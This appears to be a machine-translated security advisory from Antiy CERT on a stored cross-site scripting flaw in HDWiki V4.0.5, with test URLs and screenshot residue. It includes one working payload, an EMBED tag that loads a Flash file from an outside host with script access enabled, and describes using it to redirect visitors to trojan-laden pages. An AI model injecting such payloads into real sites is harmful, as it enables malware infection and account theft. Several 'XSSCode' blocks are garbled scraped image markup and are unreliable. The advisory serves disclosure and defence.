Affected Versions: HDWiki-V4.0.5
Hazard level: High Risk
Vulnerability description:Antiy CERT found through penetration tests that the HDWiki-V4.0.5 version does not filter the HTML elements in it when creating the edit entry, this can cause persistent cross-site and Trojan Horse mounting. If a user accesses a page that has been modified by an attacker and inserted malicious cross-site code, the user's sensitive information may be stolen and infected with the Trojan horse.
Note: The Cross-Site vulnerability is not valid for the official website of interactive encyclopedia.
Test Environment: Windows XP SP2 + IE6.0 & Windows XP SP3 + IE8.0
Test method:
[CERT Warning]The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!1,URL: http: // 10.0.6.139/wiki/index. php? Doc-view-2
XSSCode:
= 700) window. open (http://www.bkjia.com/uploads/allimg/131121/2011033040-0.png); "height = 367 src =" http://www.bkjia.com/uploads/allimg/131121/2011033040-0.png "width = 700 onload =" if (this. offline setwidth> 700) this. width = 700; if (this. offline setheight> 700) this. height = 700; "border = 0>
2
,URL: http: // 10.0.6.139/wiki/index. php? Doc-view-3
XSSCode:
= 700) window. open (http://www.bkjia.com/uploads/allimg/131121/2011031215-1.png); "height = 496 src =" http://www.bkjia.com/uploads/allimg/131121/2011031215-1.png "width = 700 onload =" if (this. offline setwidth> 700) this. width = 700; if (this. offline setheight> 700) this. height = 700; "border = 0>
3
,URL: http: // 10.0.6.139/wiki/index. php? Doc-view-4
XSSCode:
<Embed src = "http: // 10.0.54.55/33.swf" AllowScriptAccess =" always "> </EMBED>
|
Http: // 10.0.54.55/33.swf is a Flash link. The function of the webpage is used in the Flash file. Therefore, a webpage pops up when the function is successfully triggered by Flash parsing, here we take the Netease 163 website as an example for testing.
Before the jump, see:
= 700) window. open (http://www.bkjia.com/uploads/allimg/131121/201103H27-2.png); "height = 322 src =" http://www.bkjia.com/uploads/allimg/131121/201103H27-2.png "width = 700 onload =" if (this. offline setwidth> 700) this. width = 700; if (this. offline setheight> 700) this. height = 700; "border = 0>
After the jump, for example:
= 700) window. open (http://www.bkjia.com/uploads/allimg/131121/2011034Y9-3.png); "height = 318 src =" http://www.bkjia.com/uploads/allimg/131121/2011034Y9-3.png "width = 700 onload =" if (this. offline setwidth> 700) this. width = 700; if (this. offline setheight> 700) this. height = 700; "border = 0>
If you change the Netease 163 URL in the Flash bullet web site to a link with malicious behaviors, when the user triggers the Flash, the user's computer will be infected with the trojan virus, attackers can exploit this vulnerability to steal users' IM software, online banking, online gaming accounts, and other information, which brings great security risks to the majority of Internet users.
CERT lab suggestions:
Before the vendor releases the corresponding patch, the CERT lab security expert provides the following suggestions:
1. We recommend that you install the CERT defense to prevent the increasing number of Trojans and viruses. After installing the anti-virus software, the user should enable the virus monitoring function, upgrade frequently, and report problems so as to ensure the security of the computer.
2. the CERT anti-virus emergency response center updates the virus database in a timely manner. Individual users can use Cert 2009 or reica to effectively prevent Trojan webpage threats caused by such vulnerabilities and detect and kill viruses downloaded from the Trojan webpage. Cert users should promptly update Cert's defense line and ruijia to ensure your computer security and prevent computer virus intrusion.
